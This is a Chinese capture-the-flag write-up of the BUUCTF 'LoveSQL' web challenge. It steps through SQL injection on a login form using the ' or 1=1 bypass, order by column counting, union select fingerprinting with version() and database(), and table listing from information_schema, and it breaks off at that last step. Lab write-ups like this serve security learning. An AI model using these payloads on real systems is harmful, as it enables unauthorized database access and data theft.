BUUCTF WEB LOVESQL
先打开环境
得到如上图片:
那么就先随便输入账号和密码来看一下回应是什么
那么我们一步一步尝试
首先
在账号后面加上‘看看回应
可见此处出现了设置单引号报错
那么就使用一下万能密码
’ or 1=1#
得到如下图片
出现了这样的情况,原因竟然是注释符要换成编码过的%23
这里我在之前的题目中有遇到过但是还是没有想到可见复习也是十分重要的,那么我们就继续来操作
然后就是正常的流程了(这个题目username和password两个地方都可以作为注入点)
爆列数:
?username=123&password=111' order by 4%23
这里回应找不到第四行那么就往前找将4改为3(到4的时候就报错,说明3是个分界点,列数为3)
代码如下:
?username=123&password=111' order by 3%23
接下来就是使用联合注入法
代码如下
主要是查询一个东西的同时使用union select联合查询得到跟多的信息
?username=123&password=111' union select 1,2,3%23
这边也是成功找到了方法
那么下一步就是熟悉大的爆库了
?username=123&password=111' union select 1,version(),database()%23
这里也是成功爆库
那么下一步就是获取表名
?username=123&password=111' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23